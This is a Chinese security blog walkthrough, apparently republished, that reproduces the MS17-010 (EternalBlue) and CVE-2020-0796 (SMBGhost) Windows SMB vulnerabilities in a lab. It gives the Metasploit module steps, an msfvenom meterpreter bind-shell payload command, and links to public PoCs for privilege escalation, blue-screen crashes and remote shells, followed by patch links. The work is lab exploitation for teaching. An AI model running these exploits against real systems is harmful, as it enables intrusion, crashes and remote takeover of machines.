MS17-010和CVE-2020-0796的完整复现(flower安全日志)

admin 2023年7月6日18:55:40评论153 views字数 3070阅读10分14秒阅读模式

前言:

MS17-010在打内网的时候也算是常用的了,也是很基础的一个洞,但是之前好多师傅在打内网的时候都有种种问题私聊我,所以今天把MS17-010(永恒之蓝)和CVE-2020-0796都给师傅们完整的复现一遍。

MS17-010:

1,MS17-010介绍:

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。

2,漏洞原理:

漏洞利用445端口执行,原本是作为局域网共享使用的一个端口,但恶意人员可以利用此端口偷偷的执行共享服务或者其他命令执行操作。

3,影响Windows版本:

Windows XP、 Windows Server 2003. Windows Vista、Windows Server 2008、 Windows 7. Windows Server2008 R2、Windows 8.1、Windows Server 2012. Windows10、Windows Server 2012 R2、Windows Server 2016
4,复现过程:

靶机我用的是Windows Server 2008系统,迅雷下载地址:

ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_x64_dvd_617598.iso|3368839168|D282F613A80C2F45FF23B79212A3CF67|/

攻击机我用的是kali linux2022.4中的msf6,大家也可以把msf下载到windows用下载地址为:

https://windows.metasploit.com/

下载好后双击msi文件

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

点击next然后同意安装协议在选择安装盘符一般安装在c盘外面就行,安装完毕之后就设置环境变量,打开环境设置。

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

选择path编辑

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

点击新建输入安装的文件路径点确定就可以了

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

点击确定关闭然后win+r输入cmd

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

输入msfvenom即可启动了

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

我这边方便一点直接用kali上的。

先安装好win server2008的环境查看IP 地址

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

用nmap扫一下发现445端口存在ms17-010

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

然后打开msf输入search ms17-010查询一下攻击模块

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

输入use 3使用第三个模块,在输入show options查看要设置的东西

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

显示yes的都是需要设置的,我们这边就设置一个rhosts(要攻击机器的ip地址)其它保持默认,一般情况下rport都会是445如果不是就得使用 set rport 445命令来设置成445,我这边设置一下rhosts就行

set rhosts 192.168.1.105

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

设置好后直接运行就行

run


MS17-010和CVE-2020-0796的完整复现(flower安全日志)

出现这个就代表存在ms17-010

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

随后设置攻击载荷,还是先查询一下

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

选择0的攻击模块

use 0

MS17-010和CVE-2020-0796的完整复现(flower安全日志)


还是先用show options查看要设置的端口和ip,我这边还是要设置一下rhosts也就是要攻击机器的ip,lhost是自己机器的IP,lport保持默认就行

set rhosts 192.168.1.10

在输入run就可以开始攻击

run

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

成功了然后在输入一个shell命令即可那到shell

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

这边分别输入一个calc和start cmd指令让对方弹一个计算器框和cmd框试试

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

成功弹窗。

修复补丁:

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

CVE-2020-0796:

漏洞简介:

SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

影响系统版本:

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)

复现过程:

我这边用的是win10系统,迅雷下载地址为:

ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|

CVE-2020-0796的玩法比较多,有蓝屏啊,本地提权啊,还有就是反弹shell。

可以用奇安信的健侧工具看看是否存在漏洞,下载地址为:

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

下载完毕后进入文件目录运行cmd,然后输入指令监测:

CVE-2020-0796-Scanner.exe 192.168.1.106

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

存在CVE-2020-0796。

先给大家放一个本地提权的POC:

https://github.com/danigargu/CVE-2020-0796/

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

用法就是这样也是比较简单的

蓝屏POC:

https://github.com/eerykitty/CVE-2020-0796-PoC/


使用方法就是py文件后跟ip地址就行

python CVE-2020-0796.py 192.168.1.106


MS17-010和CVE-2020-0796的完整复现(flower安全日志)


MS17-010和CVE-2020-0796的完整复现(flower安全日志)

成功使目标蓝屏。

反弹shell:

https://github.com/chompie1337/SMBGhost_RCE_PoC

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

用msf生成payload

msfvenom -p windows/x64/meterpreter/bind_tcp lport=9999 -f py -o Fshell.txt

生成code替换到poc里的exploit.py的USER_PAYLOAD参数仔把参数buf改为USER_PAYLOAD。

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

然后msf里设置监听,命令如下:

use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport 9999set rhost 192.168.1.106run

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

lport与此前生产Fshell的也就是生成木马的时候的得是一致的,然后运行poc。

python3 explpit.py -ip 192.168.1.106

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

反弹shell成功

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

还是让目标弹一个计算器试试。

MS17-010和CVE-2020-0796的完整复现(flower安全日志)

成功弹出。

修复补丁:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796


原文始发于微信公众号(嗨嗨安全):MS17-010和CVE-2020-0796的完整复现(flower安全日志)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月6日18:55:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MS17-010和CVE-2020-0796的完整复现(flower安全日志)https://cn-sec.com/archives/1856263.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息